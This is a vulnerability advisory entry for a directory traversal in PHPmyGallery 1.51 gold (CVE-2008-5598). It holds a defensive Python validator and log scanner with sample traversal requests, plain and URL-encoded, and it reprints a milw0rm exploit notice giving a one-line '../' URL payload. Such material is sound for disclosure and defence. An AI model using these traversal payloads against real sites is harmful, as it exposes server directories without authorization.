PHPmyGallery 'index.php' Directory Traversal Vulnerability

Vulnerability ID: 1116960
Vulnerability type: Path traversal
Published: 2008-12-07
Updated: 2009-01-29
CVE: CVE-2008-5598
CNNVD-ID: CNNVD-200812-283
Platform: PHP
CVSS score: 5.0
Vulnerability sources
https://www.exploit-db.com/exploits/7377
https://cxsecurity.com/issue/WLB-2008120044
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-283
Vulnerability details
PHPmyGallery is a single-user, easy-to-understand back-end image management tool. A directory traversal vulnerability exists in index.php of PHPmyGallery 1.51 gold. A remote attacker can list arbitrary directories via a `..` (dot-dot) sequence in the group parameter.
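As an added illustration (not code from PHPmyGallery or from the advisory author), the following Python shows the two things a defender wants for this class of bug: a server-side check that confines a `group`-style album parameter to a fixed base directory, and the same check applied to web-server access-log lines to flag requests that would have escaped it. The gallery root path, the allow-list regex and the log lines are constructed for the example; the real PHPmyGallery directory layout is not described on the page. The check goes a little beyond the single `../` case in the advisory by also rejecting URL-encoded, double-encoded, backslash and absolute-path variants, which any detection or fix for this bug class has to handle.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed base directory for the example (assumption, not PHPmyGallery's real layout).
GALLERY_ROOT = "/var/www/phpmygallery/albums"

# Allow-list for one path segment: letters, digits, '_', '-', '.', but never '.' or '..'.
SEGMENT_RE = re.compile(r"^(?!\.{1,2}$)[A-Za-z0-9_.-]+$")


def resolve_group(root, group):
    """Return the absolute album directory for `group`, or None if the value
    would escape `root`. Two independent layers: an allow-list on every path
    segment, then a lexical containment check after normalisation."""
    decoded = unquote(unquote(group))      # collapse single and double URL encoding
    decoded = decoded.replace("\\", "/")   # treat backslashes as separators too
    if not decoded or decoded.startswith("/"):
        return None                        # empty or absolute: reject
    if not all(SEGMENT_RE.match(seg) for seg in decoded.split("/")):
        return None                        # '..', '.', empty or odd segment: reject
    candidate = os.path.normpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        return None                        # belt-and-braces: must stay under root
    return candidate


# Constructed access-log lines (Apache/nginx combined style); the second and third
# carry the traversal pattern from the advisory, plain and URL-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Dec/2008:10:00:01 +0000] "GET /phpmygallery/index.php?group=holiday2008 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Dec/2008:10:00:07 +0000] "GET /phpmygallery/index.php?group=../somefolder HTTP/1.1" 200 8112',
    '203.0.113.9 - - [07/Dec/2008:10:00:09 +0000] "GET /phpmygallery/index.php?group=%2e%2e%2f%2e%2e%2fetc HTTP/1.1" 200 9020',
    '198.51.100.2 - - [07/Dec/2008:10:01:00 +0000] "GET /phpmygallery/index.php?group=pets/cats HTTP/1.1" 200 4200',
]

LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def flag_traversal(log_lines, root=GALLERY_ROOT):
    """Return (client_ip, request_target) pairs whose `group` parameter fails
    resolve_group, i.e. requests that would have listed a directory outside root."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qs already applies one round of URL decoding to the values.
        for value in parse_qs(urlsplit(target).query).get("group", []):
            if resolve_group(root, value) is None:
                hits.append((ip, target))
    return hits


if __name__ == "__main__":
    for ip, target in flag_traversal(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {target}")
```

The allow-list is the primary control: a gallery only needs simple folder names, so anything outside `[A-Za-z0-9_.-]` is rejected before a filesystem path is even built. The `commonpath` check is redundant with it but costs nothing and protects against a later relaxation of the regex. On the log side, decoding before matching matters: a rule that only looks for the literal string `../` misses the encoded form that the third sample line carries.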
Exploit (EXP)
############### Yee7.Com ###############
############### zAx #################
PHPmyGallery Gold 1.51 (index.php) Folders Disclosure
-----------------------------------------------------------------------------------------------------------

 [+] Script        : PHPmyGallery Gold 1.51
 [+] Vuln.         : Folders Disclosure
 [+] Download      : http://phpmygallery.kapierich.net/en/downloads/
 [+] Discovered By : zAx [ThE-zAx@Hotmail.Com]
 [+] Team          : Electronic Security Team (Yee7.Com)

Exploit : http://site/phpmygallery/index.php?group=../somefolder

 [+] Somefolder is any folder on the vulnerable website
 [+] ../ = Up from this folder
 [+] You can see all folders that are in "somefolder"


[+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ]

# milw0rm.com [2008-12-07]
References

- BID 32678: http://www.securityfocus.com/bid/32678
- MILW0RM 7377: http://www.milw0rm.com/exploits/7377
- SREASON 4760: http://securityreason.com/securityalert/4760